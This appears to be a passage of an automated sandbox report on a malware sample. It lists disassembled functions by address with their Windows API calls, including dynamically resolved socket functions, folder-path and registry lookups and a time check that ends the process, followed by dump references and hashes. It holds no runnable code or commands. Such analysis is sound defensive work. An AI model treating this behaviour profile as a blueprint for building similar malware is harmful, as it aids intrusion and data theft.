                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB
                                    • API String ID: 2922868504-2651807785
                                    • Opcode ID: 27243ec2212a0939dbec5c90268051c674359b64004c1fb41df67a0f724b2831
                                    • Instruction ID: f1dff8db75096caaf26b0ad7c261e8dcf70fa1d40e085e0eb55688f206ac87da
                                    • Opcode Fuzzy Hash: 27243ec2212a0939dbec5c90268051c674359b64004c1fb41df67a0f724b2831
                                    • Instruction Fuzzy Hash: 6101B1B1A04658ABDB04DFE8DD49F7EB7B8FB45B10F000629F916E7380DB789D0186A5
                                    Function 008D7700 Relevance: 7.9, APIs: 5, Instructions: 406stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008E4800: LoadLibraryA.KERNEL32(ws2_32.dll,?,008D7741), ref: 008E4806
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,connect), ref: 008E481C
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 008E482D
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 008E483E
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,htons), ref: 008E484F
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 008E4860
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,recv), ref: 008E4871
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,socket), ref: 008E4882
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 008E4893
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,closesocket), ref: 008E48A4
                                      • Part of subcall function 008E4800: GetProcAddress.KERNEL32(00000000,send), ref: 008E48B5
                                    • StrCmpCA.SHLWAPI(?,00538F48), ref: 008D7770
                                    • StrCmpCA.SHLWAPI(?,00539038), ref: 008D7848
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D7880
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D78DD
                                      • Part of subcall function 008E7240: lstrcpy.KERNEL32(00000000), ref: 008E725A
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1437
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1459
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C147B
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C14DF
                                      • Part of subcall function 008D5BE0: lstrcpy.KERNEL32(00000000,008ED014), ref: 008D5C15
                                      • Part of subcall function 008D5BE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008D5C44
                                      • Part of subcall function 008D5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 008D5C75
                                      • Part of subcall function 008D5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 008D5C9D
                                      • Part of subcall function 008D5BE0: lstrcat.KERNEL32(00000000,00000000), ref: 008D5CA8
                                      • Part of subcall function 008D5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 008D5CD0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$AddressProc$FolderLibraryLoadPathlstrcat
                                    • String ID:
                                    • API String ID: 38527155-0
                                    • Opcode ID: 43f151e0119da8acac3e1bf1352c472ab32fbc0f033540de431293bdac0fdd33
                                    • Instruction ID: 1b9366f41744db8984bcb1e167fe140a9e1df88f2ea87176f10aef79e5b5d2e6
                                    • Opcode Fuzzy Hash: 43f151e0119da8acac3e1bf1352c472ab32fbc0f033540de431293bdac0fdd33
                                    • Instruction Fuzzy Hash: CFF17F71A042058FCB24DF69D444B69B7B1FF48324F19C2AAD809DB392E735ED46CB81
                                    Function 008D7C0F Relevance: 7.9, APIs: 5, Instructions: 367stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • StrCmpCA.SHLWAPI(?,00538F48), ref: 008D7770
                                    • StrCmpCA.SHLWAPI(?,00539038), ref: 008D7848
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D7880
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D78DD
                                      • Part of subcall function 008E7240: lstrcpy.KERNEL32(00000000), ref: 008E725A
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1437
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1459
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C147B
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C14DF
                                      • Part of subcall function 008D5BE0: lstrcpy.KERNEL32(00000000,008ED014), ref: 008D5C15
                                      • Part of subcall function 008D5BE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 008D5C44
                                      • Part of subcall function 008D5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 008D5C75
                                      • Part of subcall function 008D5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 008D5C9D
                                      • Part of subcall function 008D5BE0: lstrcat.KERNEL32(00000000,00000000), ref: 008D5CA8
                                      • Part of subcall function 008D5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 008D5CD0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FolderPathlstrcat
                                    • String ID:
                                    • API String ID: 2938889746-0
                                    • Opcode ID: 38d74721d0cabcf062adfcfc71ba32073af9d0e91a31d6bd1c7e0170d13b4ba5
                                    • Instruction ID: a314c4ad03018bb834bf228a06947c06a4ae2026b2ec6787bf15608b7481a227
                                    • Opcode Fuzzy Hash: 38d74721d0cabcf062adfcfc71ba32073af9d0e91a31d6bd1c7e0170d13b4ba5
                                    • Instruction Fuzzy Hash: B7F15E71A052058FCB24DF69D444B69BBB1FF48324F19C2AAD809DB362E735ED42CB81
                                    Function 008D781D Relevance: 7.9, APIs: 5, Instructions: 365stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • StrCmpCA.SHLWAPI(?,00538F48), ref: 008D7770
                                    • StrCmpCA.SHLWAPI(?,00539038), ref: 008D7848
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D7880
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D78DD
                                    • StrCmpCA.SHLWAPI(?,00539018), ref: 008D7B7D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 0be0ed01b75b3f6226121ca8b235ac5045daeaad8d7a4475bbff9703d3cbb3f5
                                    • Instruction ID: c462c7680314a45260a1738e78593637d20579722460d6d9c53202c0d1bd92a6
                                    • Opcode Fuzzy Hash: 0be0ed01b75b3f6226121ca8b235ac5045daeaad8d7a4475bbff9703d3cbb3f5
                                    • Instruction Fuzzy Hash: 66F15E71A052058FCB24DF69D444B69BBB1FF48324F19C2AAD809DB362E735ED42CB81
                                    Function 008D7AE0 Relevance: 7.9, APIs: 5, Instructions: 363COMMON
                                    Download Yara Rule
                                    APIs
                                    • StrCmpCA.SHLWAPI(?,00538F48), ref: 008D7770
                                    • StrCmpCA.SHLWAPI(?,00539018), ref: 008D7B7D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 35b9572ebfc0aaadd9d4b5680b1392543a9037627881e4c4d79178c927e8b910
                                    • Instruction ID: 759cc3d462547cccf89805bfe74992057851a58a821750444bf3df5024afdc39
                                    • Opcode Fuzzy Hash: 35b9572ebfc0aaadd9d4b5680b1392543a9037627881e4c4d79178c927e8b910
                                    • Instruction Fuzzy Hash: 9AE16D71A052058FCB24DF69D444B69BBB1FF48324F19C2AAD809DB362E735ED46CB81
                                    Function 008D7F60 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 008D7FB1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D7FE0
                                    • StrCmpCA.SHLWAPI(00000000,008F5204), ref: 008D8025
                                    • StrCmpCA.SHLWAPI(00000000,008F5204), ref: 008D8053
                                    • StrCmpCA.SHLWAPI(00000000,008F5204), ref: 008D8087
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: a86c745fdc53351b78e781b11d03c021d2a27c34ce7a9f05b231b2d1fbb6de50
                                    • Instruction ID: 8e86445904b60176e097b8a0b571c6d9802a78600537117d18970746b2ed3ddd
                                    • Opcode Fuzzy Hash: a86c745fdc53351b78e781b11d03c021d2a27c34ce7a9f05b231b2d1fbb6de50
                                    • Instruction Fuzzy Hash: 8941803460451ADFCB20DF68D880EAE77B4FF45304B11469AE905DB350EB71EA66CB91
                                    Function 008D80E0 Relevance: 7.6, APIs: 5, Instructions: 114stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 008D814B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D817A
                                    • StrCmpCA.SHLWAPI(00000000,008F5204), ref: 008D8192
                                    • lstrlen.KERNEL32(00000000), ref: 008D81D0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D81FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: dafff0bb5b017eb0c2b8c158c602230415f8a8823221d2902dd1ee5fbdde5c32
                                    • Instruction ID: ded5eba818ac1920eefcecb5de6382ecb9c71b46477485cba65bbb908e021d0d
                                    • Opcode Fuzzy Hash: dafff0bb5b017eb0c2b8c158c602230415f8a8823221d2902dd1ee5fbdde5c32
                                    • Instruction Fuzzy Hash: 4D415B71A0050AEBCB21DFA8D984FAABBB4FF44710F15861AA855D7344EF34E946CB90
                                    Function 008E1B00 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 008E1B52
                                      • Part of subcall function 008E1800: lstrcpy.KERNEL32(00000000,008ED014), ref: 008E182F
                                      • Part of subcall function 008E1800: lstrlen.KERNEL32(005272F8), ref: 008E1840
                                      • Part of subcall function 008E1800: lstrcpy.KERNEL32(00000000,00000000), ref: 008E1867
                                      • Part of subcall function 008E1800: lstrcat.KERNEL32(00000000,00000000), ref: 008E1872
                                      • Part of subcall function 008E1800: lstrcpy.KERNEL32(00000000,00000000), ref: 008E18A1
                                      • Part of subcall function 008E1800: lstrlen.KERNEL32(008F5568), ref: 008E18B3
                                      • Part of subcall function 008E1800: lstrcpy.KERNEL32(00000000,00000000), ref: 008E18D4
                                      • Part of subcall function 008E1800: lstrcat.KERNEL32(00000000,008F5568), ref: 008E18E0
                                      • Part of subcall function 008E1800: lstrcpy.KERNEL32(00000000,00000000), ref: 008E190F
                                    • sscanf.NTDLL ref: 008E1B7A
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 008E1B96
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 008E1BA6
                                    • ExitProcess.KERNEL32 ref: 008E1BC3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 3040284667-0
                                    • Opcode ID: b9ad0b4c85ae3dec2859fa86eadf9b8d47f76e103873295070e01334fbeada5c
                                    • Instruction ID: 9b4dbf2f84461210544425747a44bb4322b161686ddcacf51b833f578b0c5f6c
                                    • Opcode Fuzzy Hash: b9ad0b4c85ae3dec2859fa86eadf9b8d47f76e103873295070e01334fbeada5c
                                    • Instruction Fuzzy Hash: 2821D0B1518341AF8750DFA9D88496BBBF8FEC9214F408A1EF599C3220EB30D505CBA2
                                    Function 008E30D0 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E3106
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E310D
                                    • RegOpenKeyExA.ADVAPI32(80000002,0052C518,00000000,00020119,?), ref: 008E312C
                                    • RegQueryValueExA.ADVAPI32(?,0053D950,00000000,00000000,00000000,000000FF), ref: 008E3147
                                    • RegCloseKey.ADVAPI32(?), ref: 008E3151
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 5d11419a12eb1e038e67da97b0bcde62d66ae29770c70d4ec595cbcb3e3a61f0
                                    • Instruction ID: 3fa6e46b489356dea6fae9809b8c8476b604aa2dae6963158ee19c1464ca69ef
                                    • Opcode Fuzzy Hash: 5d11419a12eb1e038e67da97b0bcde62d66ae29770c70d4ec595cbcb3e3a61f0
                                    • Instruction Fuzzy Hash: 20115B72A00248AFD714CBD5DC49FBBBB78F788B10F004229FA05D3680DB755901CBA1
                                    Function 008E910D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
